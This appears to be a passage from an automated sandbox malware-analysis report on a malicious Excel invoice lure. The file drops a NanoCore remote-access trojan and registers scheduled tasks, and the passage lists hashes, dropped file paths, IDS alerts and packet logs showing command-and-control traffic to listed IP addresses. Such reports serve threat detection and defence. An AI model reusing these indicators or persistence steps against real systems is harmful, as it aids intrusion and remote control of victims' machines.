              • 103.140.250.132
              7OuHFYC7TM.exeGet hashmaliciousBrowse
              • 103.89.89.134
              Apartment.vbsGet hashmaliciousBrowse
              • 103.147.184.73
              TT.exeGet hashmaliciousBrowse
              • 103.147.184.211
              PO211000386.xlsxGet hashmaliciousBrowse
              • 103.133.106.199
              Quotation.jarGet hashmaliciousBrowse
              • 103.133.105.29
              Quotation.jarGet hashmaliciousBrowse
              • 103.133.105.29
              FRT_INV_LCIM0037223_1.xlsxGet hashmaliciousBrowse
              • 103.133.106.199
              HC8j8D3dw7Get hashmaliciousBrowse
              • 103.3.246.123

              JA3 Fingerprints

              No context

              Dropped Files

              No context

              Created / dropped Files

              C:\Program Files (x86)\SMTP Service\smtpsvc.exe
              Process:C:\Users\user\AppData\Roaming\ALP.exe
              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
              Category:dropped
              Size (bytes):603136
              Entropy (8bit):7.259103638799268
              Encrypted:false
              SSDEEP:6144:yEAverZlQDbCMN4K4CJdAbOo36JSGgR9Smne2bEWeeKy2o+0UdzDcQRe2k3OCBuq:1WHCM2K4C4ovgkuK/o+0UmQDk3BuAt/
              MD5:60E9F1E8596C98A6B07129D9C24EC359
              SHA1:0E9E28F2853681A41A9ACE446C0597320452BD9D
              SHA-256:658E8D30979ADD1DFCCCD8ADBA33C136541FE1C9D24BFDEB3FADC5A5A5252716
              SHA-512:8BB79D52B6997C26EDBC94D2CB2DDB8E679ACF77230335EC6A09EC7280DCE5C711D0630007BB33FDE03A5983FC533C89D7A77FD6673FB2100833B82EEBEB820A
              Malicious:true
              Antivirus:
              • Antivirus: Joe Sandbox ML, Detection: 100%
              • Antivirus: ReversingLabs, Detection: 30%
              Reputation:low
              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....`K...............0..*...........H... ...`....@.. ....................................@.................................hH..O....`..............................LH............................................... ............... ..H............text....(... ...*.................. ..`.rsrc........`.......,..............@..@.reloc...............2..............@..B.................H......H........?...^......o...T...............................................~..$}......}......}.....(......*...$}......}......}.....(........}......}....*...0..O.........$}......}......}.....(........{....}......{....}......{....}......{....}....*:..{....(.....*...0..w..........R.{........,f.r...p(....-).r!..p(....-%.r-..p(....-%.r9..p(....-%+0..}....+'..J.{....XT+...J.{....XT+...J.{....XT+.*..0...........rE..p.+..*..0...........ro..p.+..*..0..................+..*".(.....*....0..
              C:\Users\user\AppData\Local\Temp\tmp277F.tmp
              Process:C:\Users\user\AppData\Roaming\ALP.exe
              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):1310
              Entropy (8bit):5.1063907901076036
              Encrypted:false
              SSDEEP:24:2dH4+S/4oL600QlMhEMjn5pwjVLUYODOLG9RJh7h8gK0Rl4xtn:cbk4oL600QydbQxIYODOLedq3Sl4j
              MD5:CFAE5A3B7D8AA9653FE2512578A0D23A
              SHA1:A91A2F8DAEF114F89038925ADA6784646A0A5B12
              SHA-256:2AB741415F193A2A9134EAC48A2310899D18EFB5E61C3E81C35140A7EFEA30FA
              SHA-512:9DFD7ECA6924AE2785CE826A447B6CE6D043C552FBD3B8A804CE6722B07A74900E703DC56CD4443CAE9AB9601F21A6068E29771E48497A9AE434096A11814E84
              Malicious:false
              Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak
              C:\Users\user\AppData\Local\Temp\tmp3811.tmp
              Process:C:\Users\user\AppData\Roaming\ALP.exe
              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):1301
              Entropy (8bit):5.098799196503053
              Encrypted:false
              SSDEEP:24:2dH4+S/4oL600QlMhEMjn5pwjVLUYODOLG9RJh7h8gK0Fxtn:cbk4oL600QydbQxIYODOLedq3wj
              MD5:D7A18DB02288E1F53BDE8B2AA0ED57EC
              SHA1:D3E7B61230A6FE796DA9820F0A0EB5C5F57E817C
              SHA-256:C4F0ED567CD7C693789C55976F82E846D4B0693EF43AD45EEE552831B8E1D18C
              SHA-512:7D7D937974C71D0784C6B108A65594C32CCB4201862DA76BC3E4F50BD6068BC2B5623754DD98B62294638998AF3A523CDA00F7236CBC993B5AB13C5589379F4E
              Malicious:true
              Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak
              C:\Users\user\AppData\Roaming\ALP.exe
              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
              Category:dropped
              Size (bytes):603136
              Entropy (8bit):7.259103638799268
              Encrypted:false
              SSDEEP:6144:yEAverZlQDbCMN4K4CJdAbOo36JSGgR9Smne2bEWeeKy2o+0UdzDcQRe2k3OCBuq:1WHCM2K4C4ovgkuK/o+0UmQDk3BuAt/
              MD5:60E9F1E8596C98A6B07129D9C24EC359
              SHA1:0E9E28F2853681A41A9ACE446C0597320452BD9D
              SHA-256:658E8D30979ADD1DFCCCD8ADBA33C136541FE1C9D24BFDEB3FADC5A5A5252716
              SHA-512:8BB79D52B6997C26EDBC94D2CB2DDB8E679ACF77230335EC6A09EC7280DCE5C711D0630007BB33FDE03A5983FC533C89D7A77FD6673FB2100833B82EEBEB820A
              Malicious:true
              Antivirus:
              • Antivirus: Joe Sandbox ML, Detection: 100%
              • Antivirus: ReversingLabs, Detection: 30%
              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....`K...............0..*...........H... ...`....@.. ....................................@.................................hH..O....`..............................LH............................................... ............... ..H............text....(... ...*.................. ..`.rsrc........`.......,..............@..@.reloc...............2..............@..B.................H......H........?...^......o...T...............................................~..$}......}......}.....(......*...$}......}......}.....(........}......}....*...0..O.........$}......}......}.....(........{....}......{....}......{....}......{....}....*:..{....(.....*...0..w..........R.{........,f.r...p(....-).r!..p(....-%.r-..p(....-%.r9..p(....-%+0..}....+'..J.{....XT+...J.{....XT+...J.{....XT+.*..0...........rE..p.+..*..0...........ro..p.+..*..0..................+..*".(.....*....0..
              C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\catalog.dat
              Process:C:\Users\user\AppData\Roaming\ALP.exe
              File Type:data
              Category:dropped
              Size (bytes):3016
              Entropy (8bit):7.024371743172393
              Encrypted:false
              SSDEEP:48:Ik/lCrwfk/lCrwfk/lCrwfk/lCrwfk/lCrwfk/lCrwfk/lCrwfk/lCrwfk/lCrws:flC0IlC0IlC0IlC0IlC0IlC0IlC0IlCe
              MD5:1BD61AD9406ED789A9447AF5E4E1368C
              SHA1:10C211612AAFC0F9A3E5DD15A45EDC08E5D76038
              SHA-256:AD46B72200459E73CDEBC96C7A48468559D68DDC223627FBE4BCF93F32311F57
              SHA-512:79EF944DE5355166735808D59ABB8EB7AEF35BCFF537DD60783CAD75FC98FC9649D971C3A36A1566EA26B28FFAD57E9BC065BFF7D0B26E868AB2B2FC1DC39DBC
              Malicious:false
              Preview: Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.....@.3..{...grv+V...B.......].P...W.4C}uL.....s~..F...}......E......E...6E.....{...{.yS...7..".hK.!.x.2..i..zJ... ....f..?._....0.:e[7w{1.!.4.....&.Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.....@.3..{...grv+V...B.......].P...W.4C}uL.....s~..F...}......E......E...6E.....{...{.yS...7..".hK.!.x.2..i..zJ... ....f..?._....0.:e[7w{1.!.4.....&.Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.....@.3..{...grv+V...B.......].P...W.4C}uL.....s~..F...}......E......E...6E.....{...{.yS...7..".hK.!.x.2..i..zJ... ....f..?._....0.:e[7w{1.!.4.....&.Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.....@.3..{...grv+V...B.......].P...W.4C}uL.....s~..F...}......E......E...6E.....{...{.yS...7..".hK.!.x.2..i..zJ... ....f..?._....0.:e[7w{1.!.4.....&.Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.
              C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat
              Process:C:\Users\user\AppData\Roaming\ALP.exe
              File Type:Non-ISO extended-ASCII text, with no line terminators
              Category:dropped
              Size (bytes):8
              Entropy (8bit):3.0
              Encrypted:false
              SSDEEP:3:xSn:Qn
              MD5:0FE4707E3B0F792A304E0644708C1BA6
              SHA1:EEB449D38BA7803A61E577D9A1BCED12E66497D6
              SHA-256:FC8F3C2DD608575691CBAD3CF7B19C6908DF0E2E72CE9B39020B615D07635D68
              SHA-512:D0CBFAF4B800505D828E32ECCCF1C2AD84F4DB84B050C5517DCF5D0F1DB262222D4491D634FB6789C34C37CF4A5CB5680D875F9F57B9A58B65DD3BC041576B5C
              Malicious:true
              Preview: ..|.zx.H
              C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\storage.dat
              Process:C:\Users\user\AppData\Roaming\ALP.exe
              File Type:data
              Category:dropped
              Size (bytes):327432
              Entropy (8bit):7.99938831605763
              Encrypted:true
              SSDEEP:6144:oX44S90aTiB66x3Pl6nGV4bfD6wXPIZ9iBj0UeprGm2d7Tm:LkjYGsfGUc9iB4UeprKdnm
              MD5:7E8F4A764B981D5B82D1CC49D341E9C6
              SHA1:D9F0685A028FB219E1A6286AEFB7D6FCFC778B85
              SHA-256:0BD3AAC12623520C4E2031C8B96B4A154702F36F97F643158E91E987D317B480
              SHA-512:880E46504FCFB4B15B86B9D8087BA88E6C4950E433616EBB637799F42B081ABF6F07508943ECB1F786B2A89E751F5AE62D750BDCFFDDF535D600CF66EC44E926
              Malicious:false
              Preview: pT..!..W..G.J..a.).@.i..wpK.so@...5.=.^..Q.oy.=e@9.B...F..09u"3.. 0t..RDn_4d.....E...i......~...|..fX_...Xf.p^......>a..$...e.6:7d.(a.A...=.)*.....{B.[...y%.*..i.Q.<..xt.X..H.. ..HF7g...I.*3.{.n....L.y;i..s-....(5i...........J.5b7}..fK..HV..,...0.... ....n.w6PMl.......v."".v.......#..X.a....../...cC...i..l{>5n.._+.e.d'...}...[..../...D.t..GVp.zz......(...o......b...+`J.{....hS1G.^*I..v&.jm.#u..1..Mg!.E..U.T.....6.2>...6.l.K.w"o..E..."K%{....z.7....<...,....]t.:.....[.Z.u...3X8.QI..j_.&..N..q.e.2...6.R.~..9.Bq..A.v.6.G..#y.....O....Z)G...w..E..k(....+..O..........Vg.2xC......O...jc.....z..~.P...q../.-.'.h.._.cj.=..B.x.Q9.pu.|i4...i...;O...n.?.,. ....v?.5}.OY@.dG|<.._[.69@.2..m..I..oP=...xrK.?............b..5....i&...l.c\b}..Q..O+.V.mJ.....pz....>F.......H...6$...d...|m...N..1.R..B.i..........$....$........CY}..$....r.....H...8...li.....7 P......?h....R.iF..6...q(.@LI.s..+K.....?m..H....*. l..&<}....`|.B....3.....I..o...u1..8i=.z.W..7
              C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\task.dat
              Process:C:\Users\user\AppData\Roaming\ALP.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):38
              Entropy (8bit):4.389264605993832
              Encrypted:false
              SSDEEP:3:oNXp4EaKC5VA:oNPaZ5q
              MD5:5A6E0D2362AAA48110B2CE3504E0586F
              SHA1:E18811D7D891996D153F169C2922767360A4B812
              SHA-256:9486A35404D71E6C389BF38557AF3FA02BDB1ED8C8E3DC4D2E7B1E4A537FD80B
              SHA-512:7F1D1BAD51E97361B449F4705B0B1359522780C1421C67E68E1CEC234D231AB37AA360DE15481924D504BB1E7AD88907205149FBB4C444E618B49028CE83D668
              Malicious:false
              Preview: C:\Users\user\AppData\Roaming\ALP.exe
              C:\Users\user\Desktop\~$INVOICE = 212888585 .xlsx
              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              File Type:data
              Category:dropped
              Size (bytes):165
              Entropy (8bit):1.4377382811115937
              Encrypted:false
              SSDEEP:3:vZ/FFDJw2fV:vBFFGS
              MD5:797869BB881CFBCDAC2064F92B26E46F
              SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
              SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
              SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
              Malicious:true
              Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

              Static File Info

              General

              File type:Microsoft Excel 2007+
              Entropy (8bit):7.9979250456645605
              TrID:
              • Excel Microsoft Office Open XML Format document (40004/1) 83.33%
              • ZIP compressed archive (8000/1) 16.67%
              File name:INVOICE = 212888585 .xlsx
              File size:750528
              MD5:145e00853b80fb2d97676c4416f984a9
              SHA1:fa80c59ebbafc435e88ffdceae00450b56ec5d48
              SHA256:e9c342550d334bffc58a310997673e24eed03f4d2b9c441dec943b24e7d29d08
              SHA512:6e150bd0e392f3bb7696a0f8dcffcc453c508879165e0bef4eec268e0b5aebe40f03b4bb683970e91e4d3b010481c18c81d697f186cb813cb299deb4767d9467
              SSDEEP:12288:TV6IQfiTz7FZY3NJiA7cA0xJT+3nl8NksfTgyCbsmLjNyvvY4UnR8xOPkP+pO:56IpTz7FwJ5OT+3nlgksLfONAwtn9k6O
              File Content Preview:PK........p..S..[.............[Content_Types].xmlUT.....Aa..Aa..Aa.U.N.0....;D...m..Z5p....".>.kO.S..<Ci..IZ....U*.%N..~...GW..e.Hh./. .......Y!.=...D...Q.x(..P\]...=."`.h..(.._)Q.P).C..3..*E..f2*=W3..~.\...<.........WG......L....:..*...Y......O".0.Z.&...

              File Icon

              Icon Hash:e4e2aa8aa4b4bcb4

              Static OLE Info

              General

              Document Type:OpenXML
              Number of OLE Files:1

              OLE File "/opt/package/joesandbox/database/analysis/483709/sample/INVOICE = 212888585 .xlsx"

              Indicators

              Has Summary Info:False
              Application Name:unknown
              Encrypted Document:False
              Contains Word Document Stream:
              Contains Workbook/Book Stream:
              Contains PowerPoint Document Stream:
              Contains Visio Document Stream:
              Contains ObjectPool Stream:
              Flash Objects Count:
              Contains VBA Macros:False

              Summary

              Author:Admin
              Last Saved By:Windows User
              Create Time:2011-03-22T06:52:17Z
              Last Saved Time:2021-08-31T22:33:59Z
              Creating Application:Microsoft Excel
              Security:0

              Document Summary

              Thumbnail Scaling Desired:false
              Company:<egyptian hak>
              Contains Dirty Links:false
              Shared Document:false
              Changed Hyperlinks:false
              Application Version:15.0300

              Streams

              Stream Path: \x1OLE10NaTivE, File Type: data, Stream Size: 1012122
              General
              Stream Path:\x1OLE10NaTivE
              File Type:data
              Stream Size:1012122
              Entropy:5.98350135727
              Base64 Encoded:True
              Data ASCII:( { . . . . h ^ . . . . y . . . B . . . . . ] . . . . . . . . . . ; . _ . U u S . . . u . . . . _ . . O . . . - P . . D . c . . . . . . . ( . . . o . . . . ] . . & R v 9 . f . L . . . . . . . y \\ . = . . . ' . 5 g . . . . . E . i . . . . * . P . y . . ] g . | . N v . 5 . 7 . . 6 o m . v . . . . . . R . . . . . H { . . . . . X . ^ . . 6 . 0 y . . . . . . | . . . . " : . . . ( V . . . . . . . . . . n v . . . . { . . . e . . s . . . . . . . . " " . . . . . . g . 4 < \\ . " W . < . Y . . I 3 . R . . [ . . .
              Data Raw:28 7b ef 03 02 16 68 5e 18 f2 01 08 79 f1 bd d5 42 ba ff f7 d5 8b 5d 12 8b 1b bd ff e7 c6 16 81 e5 3b 7f 5f 20 8b 55 75 53 ff d2 05 75 0a eb b0 05 5f f6 14 4f ff e0 f9 2d 50 b8 9a 44 00 63 ea 9c 8e 18 b2 ce 13 28 9e f0 82 6f ab dd e1 93 5d fe 20 d5 26 52 76 39 02 66 a2 4c d4 e6 d5 84 af a2 c0 79 5c 1e 3d 0d 99 bb 27 b5 35 67 02 f5 81 f2 d3 45 d8 69 c3 ed 96 9b 2a 95 50 c4 79 a8 a3
              Stream Path: 4VrxadcXbYC3, File Type: empty, Stream Size: 0
              General
              Stream Path:4VrxadcXbYC3
              File Type:empty
              Stream Size:0
              Entropy:0.0
              Base64 Encoded:False
              Data ASCII:
              Data Raw:

              Network Behavior

              Snort IDS Alerts

              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
              09/15/21-11:57:44.918164UDP254DNS SPOOF query response with TTL of 1 min. and no authority53521678.8.8.8192.168.2.22
              09/15/21-11:57:44.952068UDP254DNS SPOOF query response with TTL of 1 min. and no authority53521678.8.8.8192.168.2.22
              09/15/21-11:57:45.713221TCP2025019ET TROJAN Possible NanoCore C2 60B491667712192.168.2.22103.147.184.84
              09/15/21-11:57:57.279937UDP254DNS SPOOF query response with TTL of 1 min. and no authority53505918.8.8.8192.168.2.22
              09/15/21-11:57:57.592426TCP2025019ET TROJAN Possible NanoCore C2 60B491677712192.168.2.22103.147.184.84
              09/15/21-11:58:03.786278TCP2025019ET TROJAN Possible NanoCore C2 60B491687712192.168.2.22103.147.184.84
              09/15/21-11:58:10.733434TCP2025019ET TROJAN Possible NanoCore C2 60B491697712192.168.2.22103.147.184.84
              09/15/21-11:58:18.728823TCP2025019ET TROJAN Possible NanoCore C2 60B491707712192.168.2.22103.147.184.84
              09/15/21-11:58:24.944716TCP2025019ET TROJAN Possible NanoCore C2 60B491717712192.168.2.22103.147.184.84
              09/15/21-11:58:30.859536UDP254DNS SPOOF query response with TTL of 1 min. and no authority53499728.8.8.8192.168.2.22
              09/15/21-11:58:31.159448TCP2025019ET TROJAN Possible NanoCore C2 60B491727712192.168.2.22103.147.184.84
              09/15/21-11:58:37.074525UDP254DNS SPOOF query response with TTL of 1 min. and no authority53517718.8.8.8192.168.2.22
              09/15/21-11:58:37.382541TCP2025019ET TROJAN Possible NanoCore C2 60B491737712192.168.2.22103.147.184.84
              09/15/21-11:58:43.374453UDP254DNS SPOOF query response with TTL of 1 min. and no authority53598678.8.8.8192.168.2.22
              09/15/21-11:58:43.400039UDP254DNS SPOOF query response with TTL of 1 min. and no authority53598678.8.8.8192.168.2.22
              09/15/21-11:58:43.710255TCP2025019ET TROJAN Possible NanoCore C2 60B491747712192.168.2.22103.147.184.84
              09/15/21-11:58:49.925371TCP2025019ET TROJAN Possible NanoCore C2 60B491757712192.168.2.22103.147.184.84
              09/15/21-11:58:56.179738TCP2025019ET TROJAN Possible NanoCore C2 60B491767712192.168.2.22103.147.184.84
              09/15/21-11:59:02.410366TCP2025019ET TROJAN Possible NanoCore C2 60B491777712192.168.2.22103.147.184.84
              09/15/21-11:59:08.311570UDP254DNS SPOOF query response with TTL of 1 min. and no authority53498948.8.8.8192.168.2.22
              09/15/21-11:59:08.631450TCP2025019ET TROJAN Possible NanoCore C2 60B491787712192.168.2.22103.147.184.84
              09/15/21-11:59:13.662888UDP254DNS SPOOF query response with TTL of 1 min. and no authority53646458.8.8.8192.168.2.22
              09/15/21-11:59:13.959506TCP2025019ET TROJAN Possible NanoCore C2 60B491797712192.168.2.22103.147.184.84
              09/15/21-11:59:20.299486UDP254DNS SPOOF query response with TTL of 1 min. and no authority53537458.8.8.8192.168.2.22
              09/15/21-11:59:20.602109TCP2025019ET TROJAN Possible NanoCore C2 60B491807712192.168.2.22103.147.184.84

              Network Port Distribution

              TCP Packets

              TimestampSource PortDest PortSource IPDest IP
              Sep 15, 2021 11:57:37.095418930 CEST4916580192.168.2.22136.144.41.96
              Sep 15, 2021 11:57:37.131314039 CEST8049165136.144.41.96192.168.2.22
              Sep 15, 2021 11:57:37.131509066 CEST4916580192.168.2.22136.144.41.96
              Sep 15, 2021 11:57:37.131921053 CEST4916580192.168.2.22136.144.41.96
              Sep 15, 2021 11:57:37.183017969 CEST8049165136.144.41.96192.168.2.22
              Sep 15, 2021 11:57:37.183058023 CEST8049165136.144.41.96192.168.2.22
              Sep 15, 2021 11:57:37.183075905 CEST8049165136.144.41.96192.168.2.22
              Sep 15, 2021 11:57:37.183094978 CEST8049165136.144.41.96192.168.2.22
              Sep 15, 2021 11:57:37.183176041 CEST4916580192.168.2.22136.144.41.96
              Sep 15, 2021 11:57:37.219149113 CEST8049165136.144.41.96192.168.2.22
              Sep 15, 2021 11:57:37.219204903 CEST8049165136.144.41.96192.168.2.22
              Sep 15, 2021 11:57:37.219228029 CEST8049165136.144.41.96192.168.2.22
              Sep 15, 2021 11:57:37.219252110 CEST8049165136.144.41.96192.168.2.22
              Sep 15, 2021 11:57:37.219274998 CEST8049165136.144.41.96192.168.2.22
              Sep 15, 2021 11:57:37.219297886 CEST8049165136.144.41.96192.168.2.22
              Sep 15, 2021 11:57:37.219331026 CEST4916580192.168.2.22136.144.41.96
              Sep 15, 2021 11:57:37.219364882 CEST4916580192.168.2.22136.144.41.96
              Sep 15, 2021 11:57:37.219368935 CEST4916580192.168.2.22136.144.41.96
              Sep 15, 2021 11:57:37.250674009 CEST8049165136.144.41.96192.168.2.22
              Sep 15, 2021 11:57:37.250715971 CEST8049165136.144.41.96192.168.2.22
              Sep 15, 2021 11:57:37.250739098 CEST8049165136.144.41.96192.168.2.22
              Sep 15, 2021 11:57:37.250761986 CEST8049165136.144.41.96192.168.2.22
              Sep 15, 2021 11:57:37.250785112 CEST8049165136.144.41.96192.168.2.22
              Sep 15, 2021 11:57:37.250811100 CEST8049165136.144.41.96192.168.2.22
              Sep 15, 2021 11:57:37.250834942 CEST8049165136.144.41.96192.168.2.22
              Sep 15, 2021 11:57:37.250858068 CEST8049165136.144.41.96192.168.2.22
              Sep 15, 2021 11:57:37.250883102 CEST8049165136.144.41.96192.168.2.22
              Sep 15, 2021 11:57:37.250901937 CEST8049165136.144.41.96192.168.2.22
              Sep 15, 2021 11:57:37.250930071 CEST8049165136.144.41.96192.168.2.22
              Sep 15, 2021 11:57:37.250931025 CEST4916580192.168.2.22136.144.41.96
              Sep 15, 2021 11:57:37.250955105 CEST8049165136.144.41.96192.168.2.22
              Sep 15, 2021 11:57:37.250977993 CEST8049165136.144.41.96192.168.2.22
              Sep 15, 2021 11:57:37.251000881 CEST4916580192.168.2.22136.144.41.96
              Sep 15, 2021 11:57:37.251003027 CEST8049165136.144.41.96192.168.2.22
              Sep 15, 2021 11:57:37.251019001 CEST4916580192.168.2.22136.144.41.96
              Sep 15, 2021 11:57:37.251024008 CEST4916580192.168.2.22136.144.41.96
              Sep 15, 2021 11:57:37.251081944 CEST4916580192.168.2.22136.144.41.96
              Sep 15, 2021 11:57:37.262209892 CEST4916580192.168.2.22136.144.41.96
              Sep 15, 2021 11:57:37.285747051 CEST8049165136.144.41.96192.168.2.22
              Sep 15, 2021 11:57:37.285809994 CEST8049165136.144.41.96192.168.2.22
              Sep 15, 2021 11:57:37.285851955 CEST8049165136.144.41.96192.168.2.22
              Sep 15, 2021 11:57:37.285887003 CEST8049165136.144.41.96192.168.2.22
              Sep 15, 2021 11:57:37.285924911 CEST8049165136.144.41.96192.168.2.22
              Sep 15, 2021 11:57:37.285959959 CEST8049165136.144.41.96192.168.2.22
              Sep 15, 2021 11:57:37.285995007 CEST8049165136.144.41.96192.168.2.22
              Sep 15, 2021 11:57:37.286031961 CEST8049165136.144.41.96192.168.2.22
              Sep 15, 2021 11:57:37.286067963 CEST8049165136.144.41.96192.168.2.22
              Sep 15, 2021 11:57:37.286084890 CEST4916580192.168.2.22136.144.41.96
              Sep 15, 2021 11:57:37.286112070 CEST8049165136.144.41.96192.168.2.22
              Sep 15, 2021 11:57:37.286154032 CEST8049165136.144.41.96192.168.2.22
              Sep 15, 2021 11:57:37.286190033 CEST8049165136.144.41.96192.168.2.22
              Sep 15, 2021 11:57:37.286226988 CEST8049165136.144.41.96192.168.2.22
              Sep 15, 2021 11:57:37.286263943 CEST8049165136.144.41.96192.168.2.22
              Sep 15, 2021 11:57:37.286299944 CEST8049165136.144.41.96192.168.2.22
              Sep 15, 2021 11:57:37.286335945 CEST8049165136.144.41.96192.168.2.22
              Sep 15, 2021 11:57:37.286339045 CEST4916580192.168.2.22136.144.41.96
              Sep 15, 2021 11:57:37.286372900 CEST8049165136.144.41.96192.168.2.22
              Sep 15, 2021 11:57:37.286416054 CEST8049165136.144.41.96192.168.2.22
              Sep 15, 2021 11:57:37.286456108 CEST8049165136.144.41.96192.168.2.22
              Sep 15, 2021 11:57:37.286456108 CEST4916580192.168.2.22136.144.41.96
              Sep 15, 2021 11:57:37.286494017 CEST8049165136.144.41.96192.168.2.22
              Sep 15, 2021 11:57:37.286535978 CEST8049165136.144.41.96192.168.2.22
              Sep 15, 2021 11:57:37.286571980 CEST8049165136.144.41.96192.168.2.22
              Sep 15, 2021 11:57:37.286592007 CEST4916580192.168.2.22136.144.41.96
              Sep 15, 2021 11:57:37.286608934 CEST8049165136.144.41.96192.168.2.22
              Sep 15, 2021 11:57:37.286644936 CEST8049165136.144.41.96192.168.2.22
              Sep 15, 2021 11:57:37.286679983 CEST4916580192.168.2.22136.144.41.96
              Sep 15, 2021 11:57:37.286679983 CEST8049165136.144.41.96192.168.2.22
              Sep 15, 2021 11:57:37.286725044 CEST8049165136.144.41.96192.168.2.22
              Sep 15, 2021 11:57:37.286758900 CEST4916580192.168.2.22136.144.41.96
              Sep 15, 2021 11:57:37.286763906 CEST8049165136.144.41.96192.168.2.22
              Sep 15, 2021 11:57:37.286799908 CEST8049165136.144.41.96192.168.2.22
              Sep 15, 2021 11:57:37.286843061 CEST4916580192.168.2.22136.144.41.96
              Sep 15, 2021 11:57:37.295084953 CEST4916580192.168.2.22136.144.41.96
              Sep 15, 2021 11:57:37.320092916 CEST8049165136.144.41.96192.168.2.22
              Sep 15, 2021 11:57:37.320131063 CEST8049165136.144.41.96192.168.2.22
              Sep 15, 2021 11:57:37.320156097 CEST8049165136.144.41.96192.168.2.22
              Sep 15, 2021 11:57:37.320178986 CEST8049165136.144.41.96192.168.2.22
              Sep 15, 2021 11:57:37.320199013 CEST8049165136.144.41.96192.168.2.22
              Sep 15, 2021 11:57:37.320221901 CEST8049165136.144.41.96192.168.2.22
              Sep 15, 2021 11:57:37.320247889 CEST8049165136.144.41.96192.168.2.22
              Sep 15, 2021 11:57:37.320271969 CEST8049165136.144.41.96192.168.2.22
              Sep 15, 2021 11:57:37.320291996 CEST4916580192.168.2.22136.144.41.96
              Sep 15, 2021 11:57:37.320296049 CEST8049165136.144.41.96192.168.2.22
              Sep 15, 2021 11:57:37.320317984 CEST8049165136.144.41.96192.168.2.22
              Sep 15, 2021 11:57:37.320343018 CEST8049165136.144.41.96192.168.2.22
              Sep 15, 2021 11:57:37.320347071 CEST4916580192.168.2.22136.144.41.96
              Sep 15, 2021 11:57:37.320354939 CEST4916580192.168.2.22136.144.41.96
              Sep 15, 2021 11:57:37.320370913 CEST8049165136.144.41.96192.168.2.22
              Sep 15, 2021 11:57:37.320391893 CEST4916580192.168.2.22136.144.41.96
              Sep 15, 2021 11:57:37.320395947 CEST8049165136.144.41.96192.168.2.22
              Sep 15, 2021 11:57:37.320425034 CEST8049165136.144.41.96192.168.2.22
              Sep 15, 2021 11:57:37.320446968 CEST4916580192.168.2.22136.144.41.96
              Sep 15, 2021 11:57:37.320446968 CEST8049165136.144.41.96192.168.2.22
              Sep 15, 2021 11:57:37.320470095 CEST8049165136.144.41.96192.168.2.22
              Sep 15, 2021 11:57:37.320480108 CEST4916580192.168.2.22136.144.41.96
              Sep 15, 2021 11:57:37.320492983 CEST8049165136.144.41.96192.168.2.22
              Sep 15, 2021 11:57:37.320516109 CEST8049165136.144.41.96192.168.2.22
